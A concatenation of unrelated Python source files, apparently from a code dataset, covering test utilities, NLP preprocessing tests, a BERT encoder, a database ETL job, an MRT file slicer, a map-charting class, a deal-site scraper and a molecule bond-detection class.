last past the boundary of a test. If a test begins a transaction
and then fails to abort or commit it, subsequent uses of the
transaction package may find that they are in a bad state,
unable to clean up resources. For example, the dreaded
``ConnectionStateError: Cannot close a connection joined to a
transaction``.
- A zope.testing cleanup also ensures that the global transaction
manager is in its default implicit mode, at least for the
current thread.
.. versionchanged:: 3.1.0
The :mod:`mock` module, or its backwards compatibility backport for
Python 2.7, is now available as an attribute of this module, and as
the module named ``nti.testing.mock``. Thus, for compatibility with
both Python 2 and Python 3, you can write ``from nti.testing import
mock`` or ``from nti.testing.mock import Mock``, or even just
``from nti.testing import Mock``.
.. versionchanged:: 3.1.0
Expose the most commonly used attributes of some submodules as API on this
module itself.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import transaction
import zope.testing.cleanup
from . import mock
from .mock import Mock
from .matchers import is_true
from .matchers import is_false
from .matchers import provides
from .matchers import implements
from .matchers import verifiably_provides
from .matchers import validly_provides
from .matchers import validated_by
from .matchers import not_validated_by
from .matchers import aq_inContextOf
from .time import time_monotonically_increases
__docformat__ = "restructuredtext en"
def transactionCleanUp():
"""
Implement the transaction cleanup described in the module documentation.
"""
try:
transaction.abort()
except transaction.interfaces.NoTransaction:
# An explicit transaction manager, with nothing
# to do. Perfect.
pass
finally:
# Note that we don't catch any other transaction errors.
# Those usually mean there's a bug in a resource manager joined
# to the transaction and it should fail the test.
transaction.manager.explicit = False
zope.testing.cleanup.addCleanUp(transactionCleanUp)
__all__ = [
# Things defined here we want to export
# if they do 'from nti.testing import *'
# This also defines what Sphinx documents for this module.
'transactionCleanUp',
'mock',
'Mock',
# API Convenience exports.
# * matchers
'is_true',
'is_false',
'provides',
'implements',
'verifiably_provides',
'validly_provides',
'validated_by',
'not_validated_by',
'aq_inContextOf',
# * time
'time_monotonically_increases',
# Sub-modules that should be imported with
# * imports as well. We generally don't want anything
# imported; it's better to use direct imports.
]
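# Illustrative sketch (not part of the original source) of the cleanup
# behaviour described in the module docstring; the test class is hypothetical.
# Mixing in zope.testing.cleanup.CleanUp (or calling cleanUp() in tearDown)
# runs the registered transactionCleanUp, so a transaction left open by one
# test cannot leak into the next:
#
#   import unittest
#   import transaction
#   import zope.testing.cleanup
#
#   class ExampleTest(zope.testing.cleanup.CleanUp, unittest.TestCase):
#
#       def test_forgets_to_commit(self):
#           transaction.begin()
#           # ...touch a transactional resource and "forget" to commit;
#           # the cleanup aborts it and resets the manager to implicit mode.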
|
StarcoderdataPython
|
1898935
|
from collections import defaultdict
import pytest
from transformers import AutoTokenizer, T5ForConditionalGeneration, DataCollatorForSeq2Seq, T5Config
from datasets import load_dataset, set_caching_enabled, Dataset
from promptsource.templates import DatasetTemplates
from src.preprocessors import ThreeChoiceEntailmentPreprocessor, TaskMode
from src import preprocessing
@pytest.mark.parametrize("use_preprocessor", [True, False], ids=["Preprocessor", "NoPreprocesser"])
def test_preprocess_dataset(use_preprocessor):
set_caching_enabled(False)
ds = load_dataset("anli", split="train_r1[:3]")
tokenizer = AutoTokenizer.from_pretrained('t5-small')
prompt_task = 'anli'
prompt_name = 'can we infer'
task_prompt_templates = DatasetTemplates(prompt_task)
prompt = task_prompt_templates[prompt_name]
prompt.metadata.task_mode = "ENTAILMENT"
prompt.metadata.is_mcq = False
preprocessor = None
if use_preprocessor:
preprocessor = ThreeChoiceEntailmentPreprocessor()
prompt.answer_choices = " ||| ".join(preprocessor.choices)
result, original, choice_set_tokenized = preprocessing.preprocess_dataset(
"test",
ds,
tokenizer,
prompt=prompt,
batch_size=1,
num_proc=1,
preprocessor=preprocessor
)
assert len(result) == 3 * len(ds)
assert len(original) == len(ds)
if preprocessor:
choices = preprocessor.choices
else:
choices = map(lambda s: s.strip(), prompt.answer_choices.split("|||"))
assert choice_set_tokenized == list(map(
lambda c: tokenizer(c, add_special_tokens=False)['input_ids'],
choices
))
def apply_prompt_to_ds(ex, idx):
prompt_str, output_str = prompt.apply(ex)
choices = prompt.get_answer_choices_list(ex) or []
out = {
"prompt" : prompt_str,
"output" : output_str,
"choices": choices,
"idx" : idx
}
if preprocessor:
out['choice_string'] = preprocessor.choice_string
out['domain'] = "entailment"
return out
expected_original = ds.map(
apply_prompt_to_ds,
with_indices=True,
remove_columns=['uid', 'reason'] if preprocessor else []
)
expected_rank_choices = defaultdict(list)
for i, (actual, expected) in enumerate(
zip(original.sort('idx'), expected_original.sort('idx'))
):
assert set(actual) == set(expected)
for k, expected_value in expected.items():
assert actual[k] == expected_value, f"result[{i}][{k}] is incorrect"
for j, choice in enumerate(expected['choices']):
expected_rank_choices['idx'].append([i, j])
expected_rank_choices["inputs"].append(expected['prompt'])
expected_rank_choices['is_correct'].append(choice == expected['output'].strip())
expected_rank_choices['targets'].append(choice)
expected_rank_choices = Dataset.from_dict(
expected_rank_choices
)
expected_rank_choices = expected_rank_choices.map(
lambda ex: preprocessing.tokenize_rank_choices(ex, tokenizer, 1, True),
remove_columns=expected_rank_choices.column_names
).map(
lambda ex: {'real_idx': 3 * ex['ex_idx'] + ex['choice_idx']}
).sort('real_idx')
result_ds = result.map(
lambda ex: {'real_idx': 3 * ex['ex_idx'] + ex['choice_idx']}
).sort('real_idx')
for i, (actual, expected) in enumerate(zip(result_ds, expected_rank_choices)):
assert set(actual) == set(expected)
for k, expected_value in expected.items():
assert actual[k] == expected_value, f"result[{i}][{k}] is incorrect"
set_caching_enabled(True)
def test_tokenize_rank_choices():
tokenizer = AutoTokenizer.from_pretrained('t5-small')
ex = {
"idx" : [0, 1],
"inputs" : b"Shake and Bake",
"targets" : b"Ricky Bobby",
"is_correct": True
}
inputs_tok = tokenizer(ex['inputs'].decode('utf-8'))
targets_tok = tokenizer(
ex['targets'].decode('utf-8'),
max_length=6,
padding="max_length"
)
result = preprocessing.tokenize_rank_choices(ex, tokenizer, 5)
assert set(result) == {"idx", "input_ids", "attention_mask", "labels", "is_correct",
"input_len", "labels_len", "ex_idx", "choice_idx",
"labels_attention_mask"}
assert result['idx'] == [0, 1]
assert result['ex_idx'] == 0
assert result['choice_idx'] == 1
assert result['is_correct'] == True
assert result['labels'] == targets_tok['input_ids']
assert result['input_ids'] == inputs_tok['input_ids']
assert result['attention_mask'] == inputs_tok['attention_mask']
assert result['input_len'] == len(inputs_tok['input_ids'])
assert result['labels_len'] == sum(targets_tok['attention_mask'])
|
StarcoderdataPython
|
11263271
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains vanilla BERT encoder."""
from typing import Dict, Tuple
import flax.linen as nn
import jax.numpy as jnp
from language.mentionmemory.encoders import base_encoder
from language.mentionmemory.encoders import encoder_registry
from language.mentionmemory.modules import embedding
from language.mentionmemory.modules import transformer
from language.mentionmemory.utils import default_values
from language.mentionmemory.utils import jax_utils as jut
from language.mentionmemory.utils.custom_types import Array, Dtype, InitType # pylint: disable=g-multiple-import
@encoder_registry.register_encoder('bert')
class BertEncoder(base_encoder.BaseEncoder):
"""BERT encoder.
  The BERT encoder (as in https://arxiv.org/abs/1810.04805) is based on a
  vanilla Transformer model.
Attributes:
vocab_size: size of token vocabulary.
hidden_size: dimensionality of token representations.
intermediate_dim: dimensionality of intermediate representations in MLP.
entity_dim: dimensionality of entity embeddings.
num_attention_heads: number of attention heads in Transformer layers.
num_layers: number of layers in first Transformer block.
dtype: data type of encoding (bfloat16 or float32). Parameters and certain
parts of computation (i.e. loss) are always in float32.
max_positions: number of positions (for positional embeddings).
max_length: maximal number of tokens for pre-training.
dropout_rate: dropout rate in Transformer layers.
num_segments: number of possible token types (for token type embeddings).
kernel_init: initialization function for model kernels.
bias_init: initialization function for model biases.
layer_norm_epsilon: layer norm constant for numerical stability.
"""
vocab_size: int
hidden_size: int
intermediate_dim: int
mention_encoding_dim: int
num_attention_heads: int
num_layers: int
dtype: Dtype
max_positions: int
# TODO(urikz): Move this argument out of model parameters
max_length: int
dropout_rate: float
num_segments: int = 2
kernel_init: InitType = default_values.kernel_init
bias_init: InitType = default_values.bias_init
layer_norm_epsilon: float = default_values.layer_norm_epsilon
def setup(self):
self.embedder = embedding.DictEmbed({
'token_ids':
embedding.Embed(
num_embeddings=self.vocab_size,
embedding_dim=self.hidden_size,
dtype=self.dtype,
embedding_init=self.kernel_init,
),
'position_ids':
embedding.Embed(
num_embeddings=self.max_positions,
embedding_dim=self.hidden_size,
dtype=self.dtype,
embedding_init=self.kernel_init,
),
'segment_ids':
embedding.Embed(
num_embeddings=self.num_segments,
embedding_dim=self.hidden_size,
dtype=self.dtype,
embedding_init=self.kernel_init,
)
})
self.embeddings_layer_norm = nn.LayerNorm(epsilon=self.layer_norm_epsilon)
self.embeddings_dropout = nn.Dropout(rate=self.dropout_rate)
self.encoder = transformer.TransformerBlock(
num_layers=self.num_layers,
model_dim=self.hidden_size,
intermediate_dim=self.intermediate_dim,
num_heads=self.num_attention_heads,
dropout_rate=self.dropout_rate,
dtype=self.dtype,
kernel_init=self.kernel_init,
bias_init=self.bias_init,
layer_norm_epsilon=self.layer_norm_epsilon,
)
self.mention_projector = nn.Dense(
features=self.mention_encoding_dim,
dtype=self.dtype,
)
def forward(
self,
batch: Dict[str, Array],
deterministic: bool,
) -> Tuple[Array, Dict[str, Array], Dict[str, Array]]:
loss_helpers = {}
logging_helpers = {}
embedded_input = self.embedder({
'token_ids': batch['text_ids'],
'position_ids': batch['position_ids'],
'segment_ids': batch['segment_ids']
})
embedded_input = self.embeddings_layer_norm(embedded_input)
embedded_input = self.embeddings_dropout(
embedded_input, deterministic=deterministic)
loss_helpers['word_embeddings'] = self.embedder.variables['params'][
'embedders_token_ids']['embedding']
attention_mask = batch['text_mask']
encoding = self.encoder(
encoding=embedded_input,
attention_mask=attention_mask,
deterministic=deterministic)
if 'mention_target_batch_positions' in batch:
mention_start_encodings = jut.matmul_2d_index_select(
encoding, (batch['mention_target_batch_positions'],
batch['mention_target_start_positions']))
mention_end_encodings = jut.matmul_2d_index_select(
encoding, (batch['mention_target_batch_positions'],
batch['mention_target_end_positions']))
loss_helpers['target_mention_encodings'] = self.mention_projector(
jnp.concatenate((mention_start_encodings, mention_end_encodings),
axis=-1))
return encoding, loss_helpers, logging_helpers
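# Illustrative initialization sketch (not part of the original source); the
# hyperparameters and batch shapes are made up, and it assumes the
# language.mentionmemory dependencies imported above are available.  Because
# the encode method is named `forward` rather than `__call__`, it is selected
# explicitly via the `method` argument of init/apply:
#
#   import jax
#
#   encoder = BertEncoder(
#       vocab_size=30522, hidden_size=128, intermediate_dim=512,
#       mention_encoding_dim=64, num_attention_heads=4, num_layers=2,
#       dtype=jnp.float32, max_positions=512, max_length=128,
#       dropout_rate=0.1)
#   batch = {
#       'text_ids': jnp.zeros((2, 128), jnp.int32),
#       'position_ids': jnp.tile(jnp.arange(128), (2, 1)),
#       'segment_ids': jnp.zeros((2, 128), jnp.int32),
#       'text_mask': jnp.ones((2, 128), jnp.int32),
#   }
#   params = encoder.init(jax.random.PRNGKey(0), batch, True,
#                         method=BertEncoder.forward)
#   encoding, loss_helpers, _ = encoder.apply(
#       params, batch, True, method=BertEncoder.forward)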
|
StarcoderdataPython
|
5103808
|
<filename>metadata-etl/src/main/resources/jython/OwnerTransform.py
#
# Copyright 2015 LinkedIn Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
from org.slf4j import LoggerFactory
from wherehows.common import Constant
from com.ziclix.python.sql import zxJDBC
import sys
class OwnerTransform:
_tables = {"dataset_owner": {"columns": "dataset_urn, owner_id, sort_id, namespace, db_name, source_time",
"file": "dataset_owner.csv", "table": "stg_dataset_owner"}}
    _clear_staging_template = """
DELETE FROM {table}
"""
_read_file_template = """
LOAD DATA LOCAL INFILE '{folder}/{file}'
INTO TABLE {table}
FIELDS TERMINATED BY '\x1a' ESCAPED BY '\0'
LINES TERMINATED BY '\n'
({columns})
SET owner_source = 'AUDIT';
"""
_update_dataset_id_template = """
UPDATE {table} stg
JOIN dict_dataset dd
ON stg.dataset_urn = dd.urn
SET stg.dataset_id = dd.id
"""
_update_database_id_template = """
UPDATE {table} stg
JOIN cfg_database cd
ON stg.db_name = cd.db_code
SET stg.db_id = cd.db_id
"""
_update_app_id_template = """
UPDATE {table} stg
join dir_external_user_info ldap
on stg.owner_id = ldap.user_id
SET stg.app_id = ldap.app_id,
stg.is_group = 'N',
stg.owner_id_type = 'user',
stg.is_active = ldap.is_active
"""
_update_group_app_id_template = """
UPDATE {table} stg
join dir_external_group_user_map ldap
on stg.owner_id = ldap.group_id
SET stg.app_id = ldap.app_id,
stg.is_group = 'Y',
stg.owner_id_type = 'group',
stg.is_active = 'Y'
"""
_update_owner_type_template = """
UPDATE {table} stg
join dir_external_user_info ldap
on stg.owner_id = ldap.user_id
SET stg.owner_type = CASE WHEN ldap.department_id >= 4000 THEN 'Producer' ELSE 'Consumer' END,
stg.owner_sub_type = CASE WHEN ldap.department_id = 4020 THEN 'DWH' ELSE 'BA' END
"""
_update_parent_flag = """
update {table} s
join dict_dataset d on s.dataset_urn = substring(d.urn, 1, char_length(d.urn) - char_length(substring_index(d.urn, '/', -{lvl})) - 1)
set s.is_parent_urn = 'Y'
"""
def __init__(self, args):
self.logger = LoggerFactory.getLogger('jython script : ' + self.__class__.__name__)
self.wh_con = zxJDBC.connect(args[Constant.WH_DB_URL_KEY],
args[Constant.WH_DB_USERNAME_KEY],
args[Constant.WH_DB_PASSWORD_KEY],
args[Constant.WH_DB_DRIVER_KEY])
self.wh_cursor = self.wh_con.cursor()
self.db_id = int(args[Constant.DB_ID_KEY])
self.app_folder = args[Constant.WH_APP_FOLDER_KEY]
self.metadata_folder = self.app_folder + "/" + str(self.db_id)
def run(self):
try:
self.read_file_to_stg()
self.update_dataset_id()
self.update_database_id()
self.update_app_id()
self.update_owner_type()
finally:
self.wh_cursor.close()
self.wh_con.close()
def read_file_to_stg(self):
t = self._tables["dataset_owner"]
        # Clear staging table
        query = self._clear_staging_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
        # Load file into staging table
query = self._read_file_template.format(folder=self.metadata_folder, file=t.get("file"), table=t.get("table"),
columns=t.get("columns"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_dataset_id(self):
t = self._tables["dataset_owner"]
query = self._update_dataset_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_database_id(self):
t = self._tables["dataset_owner"]
query = self._update_database_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_app_id(self):
t = self._tables["dataset_owner"]
query = self._update_app_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
query = self._update_group_app_id_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_owner_type(self):
t = self._tables["dataset_owner"]
query = self._update_owner_type_template.format(table=t.get("table"))
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
def update_parent_flag(self):
t = self._tables["dataset_owner"]
for l in range(1, 6):
query = self._update_parent_flag.format(table=t.get("table"), lvl=l)
self.logger.debug(query)
self.wh_cursor.execute(query)
self.wh_con.commit()
if __name__ == "__main__":
props = sys.argv[1]
ot = OwnerTransform(props)
ot.run()
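
# Illustrative sketch, not part of the original script: `args` is expected to be
# a dict-like mapping keyed by wherehows Constant entries; all values below are
# placeholders.
#
#   args = {Constant.WH_DB_URL_KEY: 'jdbc:mysql://localhost:3306/wherehows',
#           Constant.WH_DB_USERNAME_KEY: 'wherehows',
#           Constant.WH_DB_PASSWORD_KEY: '********',
#           Constant.WH_DB_DRIVER_KEY: 'com.mysql.jdbc.Driver',
#           Constant.DB_ID_KEY: '3',
#           Constant.WH_APP_FOLDER_KEY: '/var/tmp/wherehows'}
#   OwnerTransform(args).run()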
|
StarcoderdataPython
|
3260797
|
<gh_stars>0
import seis_database
vp_db = seis_database.VpDb()
vp_db.delete_table_vp()
vp_db.delete_table_vp_files()
vp_db.delete_table_vaps()
vp_db.delete_table_vaps_files()
|
StarcoderdataPython
|
3491326
|
<reponame>pierky/mrtparse
#!/usr/bin/env python
'''
slice.py - This script slices MRT format data.
Copyright (C) 2016 greenHippo, LLC.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Authors:
<NAME> <<EMAIL>>
<NAME> <<EMAIL>>
<NAME> <<EMAIL>>
'''
from mrtparse import *
import argparse, time, gzip, bz2, re
from datetime import datetime
def parse_args():
parser = argparse.ArgumentParser(
description='This script slices MRT format data.')
parser.add_argument(
'path_to_file',
help='specify path to MRT format file')
parser.add_argument(
'-s', type=str, metavar='START_TIME', dest='start_time',
help='specify start time in format YYYY-MM-DD HH:MM:SS')
parser.add_argument(
'-e', type=str, metavar='END_TIME', dest='end_time',
help='specify end time in format YYYY-MM-DD HH:MM:SS')
parser.add_argument(
'-i', type=int, metavar='INTERVAL', dest='interval',
help='specify interval in seconds')
parser.add_argument(
'-c', type=str, choices=['gz', 'bz2'], dest='compress_type',
help='specify compress type (gz, bz2)')
return parser.parse_args()
def conv_unixtime(t):
try:
t = datetime.strptime(t, '%Y-%m-%d %H:%M:%S')
t = int(time.mktime(t.timetuple()))
except TypeError:
t = None
except ValueError:
print('error: invalid time \'%s\'' % t)
exit(1)
return t
def file_open(f, t, c):
    f = re.sub(r'\.gz$|\.bz2$', '', f)
t = datetime.fromtimestamp(t).strftime('%Y%m%d-%H%M%S')
if c is None:
return open('%s-%s' % (f, t), 'wb')
elif c == 'gz':
return gzip.GzipFile('%s-%s.%s' % (f, t, c), 'wb')
elif c == 'bz2':
return bz2.BZ2File('%s-%s.%s' % (f, t, c), 'wb')
def slice_mrt(args):
t = start_time = conv_unixtime(args.start_time)
end_time = conv_unixtime(args.end_time)
interval = args.interval
if t is None:
d = Reader(args.path_to_file)
m = d.next()
t = m.mrt.ts
f = file_open(args.path_to_file, t, args.compress_type)
d = Reader(args.path_to_file)
for m in d:
m = m.mrt
if start_time and (m.ts < start_time):
continue
if end_time and (m.ts >= end_time):
break
if interval and (m.ts >= t + interval):
f.close()
t += interval
f = file_open(args.path_to_file, t, args.compress_type)
f.write(m.buf)
f.close()
def main():
args = parse_args()
slice_mrt(args)
if __name__ == '__main__':
main()
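
# Illustrative usage, not part of the original script (file name and times are
# placeholders):
#
#   $ python slice.py updates.20160101.0000 \
#         -s '2016-01-01 00:00:00' -e '2016-01-01 06:00:00' -i 3600 -c gz
#
# This writes one gzip-compressed MRT file per hour between the start and end
# times, named <input>-YYYYMMDD-HHMMSS.gz.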
|
StarcoderdataPython
|
5083917
|
# coding=utf-8
import json
from ... import options as opts
from ...charts.chart import Chart
from ...commons.types import List, Numeric, Optional, Sequence, Union
from ...commons.utils import produce_js_func
from ...datasets import COORDINATES
from ...globals import ChartType, TooltipFormatterType
class Geo(Chart):
"""
    <<< Geo coordinate system >>>

    The geo coordinate system component is used for drawing maps; it supports
    plotting scatter series and line sets on geographic coordinates.
"""
def __init__(self, init_opts: Union[opts.InitOpts, dict] = opts.InitOpts()):
super().__init__(init_opts=init_opts)
self.set_global_opts()
self._coordinates = COORDINATES
self._zlevel = 1
def add_coordinate(self, name: str, longitude: Numeric, latitude: Numeric):
self._coordinates.update({name: [longitude, latitude]})
def add_coordinate_json(self, json_file: str):
with open(json_file, "r", encoding="utf-8") as f:
json_reader = json.load(f)
for k, v in json_reader.items():
self.add_coordinate(k, v[0], v[1])
def get_coordinate(self, name: str) -> List:
if name in self._coordinates:
return self._coordinates[name]
def add_schema(
self,
maptype: str = "china",
is_roam: bool = True,
label_opts: Union[opts.LabelOpts, dict, None] = None,
itemstyle_opts: Union[opts.ItemStyleOpts, dict, None] = None,
emphasis_itemstyle_opts: Union[opts.ItemStyleOpts, dict, None] = None,
emphasis_label_opts: Union[opts.LabelOpts, dict, None] = None,
):
if isinstance(label_opts, opts.LabelOpts):
label_opts = label_opts.opts
if isinstance(itemstyle_opts, opts.ItemStyleOpts):
itemstyle_opts = itemstyle_opts.opts
if isinstance(emphasis_itemstyle_opts, opts.ItemStyleOpts):
emphasis_itemstyle_opts = emphasis_itemstyle_opts.opts
if isinstance(emphasis_label_opts, opts.LabelOpts):
emphasis_label_opts = emphasis_label_opts.opts
self.js_dependencies.add(maptype)
self.options.update(
geo={
"map": maptype,
"roam": is_roam,
"label": label_opts,
"itemStyle": itemstyle_opts,
"emphasis": {
"itemStyle": emphasis_itemstyle_opts,
"label": emphasis_label_opts,
},
}
)
return self
def add(
self,
series_name: str,
data_pair: Sequence,
type_: str = "scatter",
*,
is_selected: bool = True,
symbol: Optional[str] = None,
symbol_size: Numeric = 12,
color: Optional[str] = None,
label_opts: Union[opts.LabelOpts, dict] = opts.LabelOpts(),
effect_opts: Union[opts.EffectOpts, dict] = opts.EffectOpts(),
linestyle_opts: Union[opts.LineStyleOpts, dict] = opts.LineStyleOpts(),
tooltip_opts: Union[opts.TooltipOpts, dict, None] = None,
itemstyle_opts: Union[opts.ItemStyleOpts, dict, None] = None,
):
if isinstance(label_opts, opts.LabelOpts):
label_opts = label_opts.opts
if isinstance(effect_opts, opts.EffectOpts):
effect_opts = effect_opts.opts
if isinstance(linestyle_opts, opts.LineStyleOpts):
linestyle_opts = linestyle_opts.opts
if isinstance(tooltip_opts, opts.TooltipOpts):
tooltip_opts = tooltip_opts.opts
if isinstance(itemstyle_opts, opts.ItemStyleOpts):
itemstyle_opts = itemstyle_opts.opts
self._zlevel += 1
data = []
for n, v in data_pair:
if type_ == ChartType.LINES:
f, t = self.get_coordinate(n), self.get_coordinate(v)
data.append({"name": "{}->{}".format(n, v), "coords": [f, t]})
else:
lng, lat = self.get_coordinate(n)
data.append({"name": n, "value": [lng, lat, v]})
self._append_color(color)
self._append_legend(series_name, is_selected)
if type_ == ChartType.SCATTER:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"coordinateSystem": "geo",
"symbol": symbol,
"symbolSize": symbol_size,
"data": data,
"label": label_opts,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
elif type_ == ChartType.EFFECT_SCATTER:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"coordinateSystem": "geo",
"showEffectOn": "render",
"rippleEffect": effect_opts,
"symbol": symbol,
"symbolSize": symbol_size,
"data": data,
"label": label_opts,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
elif type_ == ChartType.HEATMAP:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"coordinateSystem": "geo",
"data": data,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
elif type_ == ChartType.LINES:
self.options.get("series").append(
{
"type": type_,
"name": series_name,
"zlevel": self._zlevel,
"effect": effect_opts,
"symbol": symbol or ["none", "arrow"],
"symbolSize": symbol_size,
"data": data,
"lineStyle": linestyle_opts,
"tooltip": tooltip_opts,
"itemStyle": itemstyle_opts,
}
)
return self
def set_global_opts(
self,
title_opts: Union[opts.TitleOpts, dict] = opts.TitleOpts(),
tooltip_opts: Union[opts.TooltipOpts, dict] = opts.TooltipOpts(
formatter=produce_js_func(TooltipFormatterType.GEO)
),
legend_opts: Union[opts.LegendOpts, dict] = opts.LegendOpts(),
toolbox_opts: Union[opts.ToolboxOpts, dict] = None,
xaxis_opts: Union[opts.AxisOpts, dict, None] = None,
yaxis_opts: Union[opts.AxisOpts, dict, None] = None,
visualmap_opts: Union[opts.VisualMapOpts, dict, None] = None,
datazoom_opts: List[Union[opts.DataZoomOpts, dict, None]] = None,
):
return super().set_global_opts(
title_opts=title_opts,
tooltip_opts=tooltip_opts,
legend_opts=legend_opts,
toolbox_opts=toolbox_opts,
xaxis_opts=xaxis_opts,
yaxis_opts=yaxis_opts,
visualmap_opts=visualmap_opts,
datazoom_opts=datazoom_opts,
)
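

def _example_geo_usage():
    # Illustrative sketch, not part of the original module: build a minimal Geo
    # chart with the API defined above. The series data are placeholders; the
    # city names must exist in the built-in COORDINATES dataset.
    geo = Geo()
    geo.add_schema(maptype="china")
    geo.add("sales", [("广州", 55), ("北京", 66)], type_=ChartType.EFFECT_SCATTER)
    geo.set_global_opts(
        title_opts=opts.TitleOpts(title="Geo example"),
        visualmap_opts=opts.VisualMapOpts(),
    )
    return geo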
|
StarcoderdataPython
|
11384940
|
from bs4 import BeautifulSoup
import requests
import webbrowser
def getDeals(cat,page):
dealsList=[]
url="https://www.hotukdeals.com/{}?page={}".format(cat,page)
soup = BeautifulSoup(requests.get(url).content,"html5lib")
deals = soup.find_all("article")
for deal in deals:
if "thread--expired" in deal["class"]:
continue
linkElement = deal.find("a",{"class":"thread-title--list"})
title = linkElement["title"]
try:
href = deal.find("a",{"class":"cept-dealBtn"})["href"]
price = deal.find("span",{"class":"thread-price"}).text
except (AttributeError, TypeError):
continue
if price == "FREE":
price = 0
else:
try:
price = float(price[1:].replace(",",""))
except ValueError:
# print("ERROR: couldn't parse price",price)
continue
dealsList.append([title,price,href])
return dealsList
def maxPrice(li, maxp):
    # keep only the leading items priced at or below maxp
    # (assumes li is sorted by price, ascending)
    index = 0
    for item in li:
        if item[1] > maxp:
            break
        index += 1
    return li[:index]
def numSort(li):
return sorted(li, key = lambda x: x[1]) # https://www.geeksforgeeks.org/python-sort-list-according-second-element-sublist/
def keyFilter(keywords,items):
filteredList = []
for item in items:
if any(key.lower() in item[0].lower() for key in keywords):
filteredList.append(item)
return numSort(filteredList)
def getInputs(prompt):
print("Ctrl+C to finish submitting keywords")
inputs=[]
while True:
try:
inputs.append(input(prompt))
except KeyboardInterrupt:
break
return inputs
def printList(li):
count = 0
for item in li:
count+=1
print(str(count)+")","£"+str(item[1]),"-",item[0])
n = int(input("Scrape results from how many pages: "))
cat=input("Category [hot/new] (leave blank for default): ").lower()
print("Loading...")
deals = []
for i in range(1, n + 1):
    deals.extend(getDeals(cat, i))
sortedDeals = numSort(deals)
print("Done")
while True:
print()
menuDict = {
"K":"Keyword filter",
"P":"Price filter",
"D":"Display results",
"G":"Go to number"
}
for key in menuDict:
print(key,":",menuDict[key])
print()
option = input("Select option: ").lower()
if option == "k":
keywords = getInputs("Add a keyword: ")
sortedDeals = keyFilter(keywords, deals)
elif option == "p":
sortedDeals = maxPrice(numSort(deals), float(input("Max price: ")))
elif option == "d":
printList(sortedDeals)
elif option == "g":
index = int(input("Number: "))
webbrowser.open_new_tab(requests.get(sortedDeals[index-1][2]).url)
|
StarcoderdataPython
|
1697243
|
<reponame>cstein/neb
import copy
import numpy
import atom
import bond
import angle
class Molecule(object):
""" A molecule.
A molecule is at the minimum a collection of atoms.
The molecule class can also be asked to identify all bonds. This can be
quite costly since we use a brute force approach.
"""
_bond_threshold = 0.45 # Added threshold for bonds. Replicates openbabel
def __init__(self):
self._charge = 0
self._multiplicity = 1
self._atoms = []
self._bonds = []
self._name = ""
# class methods
@classmethod
def fromMolecule(cls, m):
M = cls()
M.setCharge(m.getCharge())
M.setMultiplicity(m.getMultiplicity())
M.setName(m.getName())
if m.getNumAtoms() > 0:
M.addAtoms(*m.getAtoms())
# currently we do not transfer bond information
return M
# getters and setters for various properties
def addAtom(self, _atom):
#assert isinstance(_atom, atom.Atom), "You attempted to add something that was not an atom."
self._atoms.append(copy.deepcopy(_atom))
def addAtoms(self, *args):
for _atom in args:
self.addAtom(_atom)
def getNumAtoms(self):
""" Returns the number of atoms in the molecule """
return len(self._atoms)
def getAtoms(self):
for _atom in self._atoms:
yield _atom
def getBonds(self):
""" Returns all bonds (as an iterator) in the molecule
If the bond list has not been calculated before, the bonds are
            perceived through the percieveBonds method.
"""
if len(self._bonds) == 0:
self._bonds = list(self.percieveBonds())
for _bond in self._bonds:
yield _bond
def getName(self):
return self._name
def setName(self, value):
assert isinstance(value, str)
self._name = value
def getCharge(self):
return self._charge
def setCharge(self, value):
assert isinstance(value, int)
self._charge = value
def getMultiplicity(self):
return self._multiplicity
def setMultiplicity(self, value):
assert isinstance(value, int)
self._multiplicity = value
# properties that are lazily evaluated such as bonds and angles
    def percieveBonds(self):
        """ This method attempts to perceive bonds
It works by comparing atom distances to covalent radii of the atoms.
It is not optimized in any way.
"""
for iat, atom1 in enumerate(self.getAtoms()):
for jat, atom2 in enumerate(self.getAtoms()):
if iat <= jat: continue
dr = atom2.getCoordinate() - atom1.getCoordinate()
R2 = dr.dot(dr)
dr_cov = atom1.getCovalentRadius() + atom2.getCovalentRadius() + self._bond_threshold
R2_cov = dr_cov**2
if R2 < R2_cov:
yield bond.Bond(id1=iat, id2=jat)
    def percieveAngles(self):
        """ This method attempts to perceive angles
It works by iterating through all bonds in the molecule
"""
for ibd, bond1 in enumerate(self.getBonds()):
for jbd, bond2 in enumerate(self.getBonds()):
if ibd <= jbd: continue
jatm = bond1.sharesAtom(bond2)
